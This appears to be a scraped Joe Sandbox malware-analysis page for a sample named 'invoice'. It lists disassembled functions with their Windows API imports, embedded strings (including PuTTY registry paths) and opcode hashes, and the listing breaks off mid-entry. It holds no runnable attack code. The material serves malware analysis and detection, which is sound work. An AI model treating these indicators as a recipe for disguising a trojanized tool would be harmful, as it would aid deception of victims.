Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: ErrorLast$CloseConnectHandleNamedPipe
String ID: Error while listening to named pipe: %s
API String ID: 280651837-1472817922
Opcode ID: d3f3dd0bb48a9f287ac221daa85ce21a12c226880e0d71c6668c0718b7e52eee
Instruction ID: 5940b8cca1f5137d5a38f663b8c6eafa5d35f92fb99c7e0dc413aa7be77b5f5b
Opcode Fuzzy Hash: d3f3dd0bb48a9f287ac221daa85ce21a12c226880e0d71c6668c0718b7e52eee
Instruction Fuzzy Hash: 2B218636B4060559EE61EBA7FC487DA6360A794BE4F05403A9E5E43BE5DE3CC687C300

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCB43D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70COMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 000000013FDCB4EC
inet_ntoa.WS2_32 ref: 000000013FDCB4F4

Strings

addr->addresses && step.curraddr < addr->naddresses, xrefs: 000000013FDCB4CD
<unknown>, xrefs: 000000013FDCB4AC
../windows/winnet.c, xrefs: 000000013FDCB4D4

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: htonlinet_ntoa
String ID: ../windows/winnet.c$<unknown>$addr->addresses && step.curraddr < addr->naddresses
API String ID: 298042256-2577639094
Opcode ID: a65ea0b1bf26abefb28c47602e1c940f0147b032ec4eceb081f5bfb5b989f9c2
Instruction ID: 2709a343fd0e5754d9c0c55427ae72896712d965a8f75dc0220b27d01c6269d8
Opcode Fuzzy Hash: a65ea0b1bf26abefb28c47602e1c940f0147b032ec4eceb081f5bfb5b989f9c2
Instruction Fuzzy Hash: 55212FB6B5974086FF24DB66E8987E923A0AB49FC4F495039DD4E077A5DB28C643C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCFB25 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32 ref: 000000013FDCFB6E
RegQueryValueExA.ADVAPI32 ref: 000000013FDCFBB6

Part of subcall function 000000013FDDFF98: _set_error_mode.LIBCMT ref: 000000013FDDFFBF

Strings

../windows/winstore.c, xrefs: 000000013FDCFBD7
HostName, xrefs: 000000013FDCFB2A
size < allocsize, xrefs: 000000013FDCFBD0

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: QueryValue$_set_error_mode
String ID: ../windows/winstore.c$HostName$size < allocsize
API String ID: 4156801415-3828489562
Opcode ID: 0052a05efee845498c0671325bd686e70066b144eee19f7cca3db9c89506f6bc
Instruction ID: 869050651375cc713cd1456bf7eb0885ead698e8e3771ce7b6ece05792a5ccd0
Opcode Fuzzy Hash: 0052a05efee845498c0671325bd686e70066b144eee19f7cca3db9c89506f6bc
Instruction Fuzzy Hash: 0821C13662565086FF60DB69E464BDA7391F789B94F405139FD4E4BB98DB3CC6038B00

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCB7C9 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 60COMMON

Download Yara Rule

APIs

htonl.WS2_32 ref: 000000013FDCB84D

Strings

family != AF_UNSPEC, xrefs: 000000013FDCB7FC, 000000013FDCB86A
addr->addresses && step.curraddr < addr->naddresses, xrefs: 000000013FDCB82E
../windows/winnet.c, xrefs: 000000013FDCB803, 000000013FDCB835, 000000013FDCB871, 000000013FDCB88A
false && "bad address family in sk_addrcopy", xrefs: 000000013FDCB883

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: htonl
String ID: ../windows/winnet.c$addr->addresses && step.curraddr < addr->naddresses$false && "bad address family in sk_addrcopy"$family != AF_UNSPEC
API String ID: 2009864989-2667264605
Opcode ID: 259f7db0486e9cefad80c6f4d6b41354f09648b2248f24083a2d05a246a0a888
Instruction ID: 223bb7513eab508c9f722495f621aa0a25b18c91a7823b7076401b89497eccfd
Opcode Fuzzy Hash: 259f7db0486e9cefad80c6f4d6b41354f09648b2248f24083a2d05a246a0a888
Instruction Fuzzy Hash: 74214F31E40545D6FF249BAAD8883E927A1EB15B84F99813DDA4C477F1DB28C78BC710

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDBA7EA Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 55windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32 ref: 000000013FDBA869
SendDlgItemMessageA.USER32 ref: 000000013FDBA8AB

Strings

c && c->ctrl->generic.type == CTRL_LISTBOX, xrefs: 000000013FDBA80E
../windows/winctrls.c, xrefs: 000000013FDBA815, 000000013FDBA83D
c->ctrl->listbox.height != 0, xrefs: 000000013FDBA836

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: ItemMessageSend
String ID: ../windows/winctrls.c$c && c->ctrl->generic.type == CTRL_LISTBOX$c->ctrl->listbox.height != 0
API String ID: 3015471070-3179740606
Opcode ID: 87589d17449776ec7f1a4c906da676e8b64d155e9cfd0285e7c170b91d67d207
Instruction ID: 4ca413229ebda4a5108bfd826ae809daa9a4b05c66992bf88bb6750ecc43d05a
Opcode Fuzzy Hash: 87589d17449776ec7f1a4c906da676e8b64d155e9cfd0285e7c170b91d67d207
Instruction Fuzzy Hash: 7521A235B0054485FB648B5AE9587D82760FB89B94F40923ADE0D47BE0DF38CA47CB40

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDD0446 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32 ref: 000000013FDD04A5
RegSetValueExA.ADVAPI32 ref: 000000013FDD04D3
RegCloseKey.ADVAPI32 ref: 000000013FDD04DE

Strings

Software\SimonTatham\PuTTY\SshHostKeys, xrefs: 000000013FDD0492
%s@%d:, xrefs: 000000013FDD0472

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: CloseCreateValue
String ID: %s@%d:$Software\SimonTatham\PuTTY\SshHostKeys
API String ID: 1818849710-1135138915
Opcode ID: fb270ac005ee4fc309f9ec2740b3eb7e5c2b3b877f71d23ec84378a6a16f2442
Instruction ID: 8e4b981073ed8631dadb94e12598950b74d0c9c539f0d32564c2c348a21051c5
Opcode Fuzzy Hash: fb270ac005ee4fc309f9ec2740b3eb7e5c2b3b877f71d23ec84378a6a16f2442
Instruction Fuzzy Hash: 1211E335B1064459FA50EF56B854BDA6310BB99FD0F405139BE4E477A5DE38C7038700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDD0E35 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32 ref: 000000013FDD0E82
DeleteFileA.KERNEL32 ref: 000000013FDD0E97
GetLastError.KERNEL32 ref: 000000013FDD0EA1
GetLastError.KERNEL32 ref: 000000013FDD0EAC

Strings

Unable to delete '%s': %s, xrefs: 000000013FDD0EB9

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: ErrorFileLast$CreateDelete
String ID: Unable to delete '%s': %s
API String ID: 3657518308-26304762
Opcode ID: 750c53376dccbd1e625388524a403689a45542544a905d7f01768cc4bbb06c51
Instruction ID: a9d3b9936beec82fd639210ff36386d0be4a6d8667ada680e0fa45be56977234
Opcode Fuzzy Hash: 750c53376dccbd1e625388524a403689a45542544a905d7f01768cc4bbb06c51
Instruction Fuzzy Hash: 6C11D635F0060256EB24AB75B95939E2292AB947F0F15433CD97687BE4EF3C8B478740

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDDE75C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000000013FDDE778
GetProcAddress.KERNEL32 ref: 000000013FDDE78E
FreeLibrary.KERNEL32 ref: 000000013FDDE7AB

Strings

mscoree.dll, xrefs: 000000013FDDE76F
CorExitProcess, xrefs: 000000013FDDE787

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 281d7e7beabd4c23ca28df20e9e2d1397a786e532fbf201cd242b8a856b0b05c
Instruction ID: f4e83f708aa4bb8f175a4def4c5aa762608fa895c7e742f502a715449bd62e2f
Opcode Fuzzy Hash: 281d7e7beabd4c23ca28df20e9e2d1397a786e532fbf201cd242b8a856b0b05c
Instruction Fuzzy Hash: 91F0A775B21A40A5FF549F51E8887E43361EF88741F45103DA90F455B5DF3CC68ACB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDF6B80 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000000013FDF6BA8
_set_statfp.LIBCMT ref: 000000013FDF6BC3
_set_statfp.LIBCMT ref: 000000013FDF6BDF
_set_statfp.LIBCMT ref: 000000013FDF6C1B

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: a629777c6950c5bf68b36c6150f4169f6c860825aff3acc407c833511d1da4fb
Instruction ID: 298a80a494ebabe9acabe4b8e1c3ecae319705963edd61f8e858db3ab00dba8f
Opcode Fuzzy Hash: a629777c6950c5bf68b36c6150f4169f6c860825aff3acc407c833511d1da4fb
Instruction Fuzzy Hash: 3311A572E14B0112F75425E8E94EBFD1790AB54370F9C063CEDBA46AD79A288B8FC204

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDECB38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 212COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000013FDECDE1

Part of subcall function 000000013FDDFCA0: _invalid_parameter_noinfo.LIBCMT ref: 000000013FDDFCBD

Strings

UTF-16LEUNICODE, xrefs: 000000013FDECD85
UTF-8, xrefs: 000000013FDECD64
ccs, xrefs: 000000013FDECD2D

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 546ed2fb86d5acd6b0cce70174a99b717d8c22a9dbdbe498aacc5faf59ac19d0
Instruction ID: 792b3abe9dd0080ffadc14800e5803830e4a2a86ed1976a7794be7c4a594e447
Opcode Fuzzy Hash: 546ed2fb86d5acd6b0cce70174a99b717d8c22a9dbdbe498aacc5faf59ac19d0
Instruction Fuzzy Hash: A781BC32E8425089F7758EA9825C3FD3FA0A336748F59903DCA0E876D5D22A8B43D342

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDD7528 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000013FDD754F
_invalid_parameter_noinfo.LIBCMT ref: 000000013FDD7723

Strings

, xrefs: 000000013FDD76AC
*, xrefs: 000000013FDD765B

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: $*
API String ID: 3215553584-3982473090
Opcode ID: e031b159c5a48edc6480a90d07913c50a3528e1611503140d5fb547273b94625
Instruction ID: 5e3d8396a776cfd978bab4a0d35545057632e4f77d1b44bbdef53e6d95c9b034
Opcode Fuzzy Hash: e031b159c5a48edc6480a90d07913c50a3528e1611503140d5fb547273b94625
Instruction Fuzzy Hash: A851B3729142108BFBA59FBC804C3ED3BA0FB05B59F5412BEEA46462D9E734C683DB01

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDDFF98 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

_set_error_mode.LIBCMT ref: 000000013FDDFFBF

Strings

Microsoft Visual C++ Runtime Library, xrefs: 000000013FDE01D7
extralen <= maxsize - oldlen, xrefs: 000000013FDE017B
../memory.c, xrefs: 000000013FDE017A

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: _set_error_mode
String ID: ../memory.c$Microsoft Visual C++ Runtime Library$extralen <= maxsize - oldlen
API String ID: 1949149715-2942123797
Opcode ID: 6046e23b31d5bea305e755554855f7a8043d8908cf6440d8e7529dc5c9c32cad
Instruction ID: 70e5d5cc96847fb2301c38dd7cd6bae08c896e730d49f940de0e630fc185d883
Opcode Fuzzy Hash: 6046e23b31d5bea305e755554855f7a8043d8908cf6440d8e7529dc5c9c32cad
Instruction Fuzzy Hash: FA31F932B1468081F6209F56B95C7EAA650FB99BC4F584139BF4D47FAACA38C703CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDBA38D Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON

Download Yara Rule

APIs

IsDlgButtonChecked.USER32 ref: 000000013FDBA3EA

Strings

false && "no radio button was checked", xrefs: 000000013FDBA3FB
../windows/winctrls.c, xrefs: 000000013FDBA3BB, 000000013FDBA402
c && c->ctrl->generic.type == CTRL_RADIO, xrefs: 000000013FDBA3B4

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: ButtonChecked
String ID: ../windows/winctrls.c$c && c->ctrl->generic.type == CTRL_RADIO$false && "no radio button was checked"
API String ID: 1719414920-565228470
Opcode ID: d4e8160fe198a2bf523c377437ae82eb61cb7c441eb4f6d78bc296a0a2038a40
Instruction ID: 15272a8e0784340221dc696ac77bf8e928b1eabedc756a87a5bdaa7b3c0e8473
Opcode Fuzzy Hash: d4e8160fe198a2bf523c377437ae82eb61cb7c441eb4f6d78bc296a0a2038a40
Instruction Fuzzy Hash: 0F116D31B0050995FA14EF9BD9857D82B61FB89B84F818039DE4D873A1EB79CA4BC710

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCEE6C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38networkCOMMON

Download Yara Rule

APIs

WSAAsyncSelect.WS2_32 ref: 000000013FDCEEBF

Part of subcall function 000000013FDDFF98: _set_error_mode.LIBCMT ref: 000000013FDDFFBF

WSAGetLastError.WS2_32 ref: 000000013FDCEED4

Strings

winsel_hwnd, xrefs: 000000013FDCEE96
../windows/winselgui.c, xrefs: 000000013FDCEE9D

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: AsyncErrorLastSelect_set_error_mode
String ID: ../windows/winselgui.c$winsel_hwnd
API String ID: 3444122918-2156671452
Opcode ID: 452d78cd5780906f47d2bfdaec747f1203916ab9163a196f639cf6ec540ce0b6
Instruction ID: 5f2b1b8f64e2780e12332ee6daf772465a3823471fc7698ea3e5306f2dfbfcdf
Opcode Fuzzy Hash: 452d78cd5780906f47d2bfdaec747f1203916ab9163a196f639cf6ec540ce0b6
Instruction Fuzzy Hash: C9F0C276F0051159FF656BAAE884BE9029267587E0F415538CC19833E0EA6D8A8B8740

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDCFF38 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32 ref: 000000013FDCFF63
RegDeleteKeyA.ADVAPI32 ref: 000000013FDCFF88
RegCloseKey.ADVAPI32 ref: 000000013FDCFF9B

Strings

Software\SimonTatham\PuTTY\Sessions, xrefs: 000000013FDCFF50

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: CloseDeleteOpen
String ID: Software\SimonTatham\PuTTY\Sessions
API String ID: 3399588633-490553574
Opcode ID: 6dce5fd30180f190bfa999ac67186416f8f97ca57d9d4c53712894cd4f706bac
Instruction ID: ec7934c24fe9df05aef837ee835b0e6784bc1710202f92db480dafaccd86762d
Opcode Fuzzy Hash: 6dce5fd30180f190bfa999ac67186416f8f97ca57d9d4c53712894cd4f706bac
Instruction Fuzzy Hash: DC018635A1464455FD10FB62E8697DE6360AB85FD0F554139FD1E077A5DE28C743C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDE5FCC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000000013FDE5FEC
try_get_function.LIBVCRUNTIME ref: 000000013FDE6026

Strings

GetLastActivePopup, xrefs: 000000013FDE601F
GetActiveWindow, xrefs: 000000013FDE5FE5

Memory Dump Source

Source File: 00000004.00000002.737348865.000000013FD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 000000013FD50000, based on PE: true

Associated: 00000004.00000002.737339479.000000013FD50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737474497.000000013FE28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737480080.000000013FE2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737488561.000000013FE2E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.737495267.000000013FE35000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13fd50000_invoice.jbxd

Similarity

API ID: try_get_function
String ID: GetActiveWindow$GetLastActivePopup
API String ID: 2742660187-3742175580
Opcode ID: 665c3f016d1b27aad9494fe2db5f2fb3c295d01823475e42ed39567f7b18aca0
Instruction ID: b473b5ea523b6928f051f243e9ec08f4acbb3f8ee1d80b5548072bd04371cba3
Opcode Fuzzy Hash: 665c3f016d1b27aad9494fe2db5f2fb3c295d01823475e42ed39567f7b18aca0
Instruction Fuzzy Hash: 2AF01D75E6274691FE1A9F92E8457E01391E718351F89043ECD0C063A1EE3C9B9BC360

Uniqueness

Uniqueness Score: -1.00%

Function 000000013FDE5F5C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000000013FDE5F8C
try_get_function.LIBVCRUNTIME ref: 000000013FDE5FAE

